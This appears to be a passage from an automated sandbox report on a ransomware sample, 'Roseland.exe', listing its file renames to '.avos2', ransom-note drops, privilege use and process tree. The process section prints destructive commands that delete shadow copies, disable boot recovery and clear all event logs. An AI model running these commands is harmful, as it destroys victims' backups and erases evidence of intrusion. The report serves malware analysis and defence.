"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1715839980.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

memory/1632-54-0x0000000000000000-mapping.dmp

memory/1736-55-0x0000000000000000-mapping.dmp

memory/620-56-0x0000000000000000-mapping.dmp

memory/1456-57-0x0000000000000000-mapping.dmp

memory/692-60-0x0000000000000000-mapping.dmp

memory/1264-58-0x0000000000000000-mapping.dmp

memory/1180-59-0x0000000000000000-mapping.dmp

memory/380-61-0x0000000000000000-mapping.dmp

memory/1068-62-0x0000000000000000-mapping.dmp

memory/2388-63-0x0000000000000000-mapping.dmp

memory/2388-64-0x000007FEFB851000-0x000007FEFB853000-memory.dmp

memory/2388-67-0x0000000002434000-0x0000000002437000-memory.dmp

memory/2388-66-0x000007FEF2D50000-0x000007FEF38AD000-memory.dmp

memory/2388-68-0x000000001B740000-0x000000001BA3F000-memory.dmp

memory/2388-69-0x000000000243B000-0x000000000245A000-memory.dmp

memory/2388-70-0x0000000002434000-0x0000000002437000-memory.dmp

memory/2388-71-0x000000000243B000-0x000000000245A000-memory.dmp

memory/2876-72-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 982338975335c602272a8753d769d083
SHA1 4d2c9acaf021fb270d980f89f690cd3ca6c7bd50
SHA256 8d149e376e6538ecb9d1eb7f8d8673aa305dce25de7ee01956ab6cffd573e664
SHA512 b323c8ba1330ab3d872e1467e5040788492132e173c1dd6d003a4498ed7386a98af81f68b6508b5a60442465b979c2b18fad596810543d457f275052e1cb2d55

memory/2876-77-0x000007FEF3C30000-0x000007FEF478D000-memory.dmp

memory/2876-78-0x000000001B8B0000-0x000000001BBAF000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2876-80-0x0000000002464000-0x0000000002467000-memory.dmp

memory/2876-81-0x000000000246B000-0x000000000248A000-memory.dmp

memory/2964-82-0x0000000000000000-mapping.dmp

memory/2976-83-0x0000000000000000-mapping.dmp

memory/2876-84-0x0000000002464000-0x0000000002467000-memory.dmp

memory/2876-85-0x000000000246B000-0x000000000248A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-13 09:23

Reported

2023-01-13 09:25

Platform

win10v2004-20221111-en

Max time kernel

145s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\AddConvertFrom.tif => C:\Users\Admin\Pictures\AddConvertFrom.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\OpenLimit.tiff => C:\Users\Admin\Pictures\OpenLimit.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ResetJoin.png => C:\Users\Admin\Pictures\ResetJoin.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\TestSave.raw => C:\Users\Admin\Pictures\TestSave.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\CopyClose.tif => C:\Users\Admin\Pictures\CopyClose.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DenyOut.png => C:\Users\Admin\Pictures\DenyOut.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DisableAdd.png => C:\Users\Admin\Pictures\DisableAdd.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\OpenLimit.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\RequestUnregister.crw => C:\Users\Admin\Pictures\RequestUnregister.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\SendDebug.tif => C:\Users\Admin\Pictures\SendDebug.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\302165477.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rll C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsymsb.ttf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sq.pak.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-32_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-300.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.aff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_sv_135x40.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\he-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\ru-RU\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\TabTip.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.71\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\blocklist.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.stats.json C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-100.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymk.ttf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lo.pak.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4892 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 2556 wrote to memory of 1992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2556 wrote to memory of 1992 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4892 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4892 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 2656 wrote to memory of 3612 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2656 wrote to memory of 3612 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4880 wrote to memory of 4812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4880 wrote to memory of 4812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2784 wrote to memory of 4956 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2784 wrote to memory of 4956 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3804 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3804 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4892 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4984 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4984 wrote to memory of 4736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4984 wrote to memory of 4736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

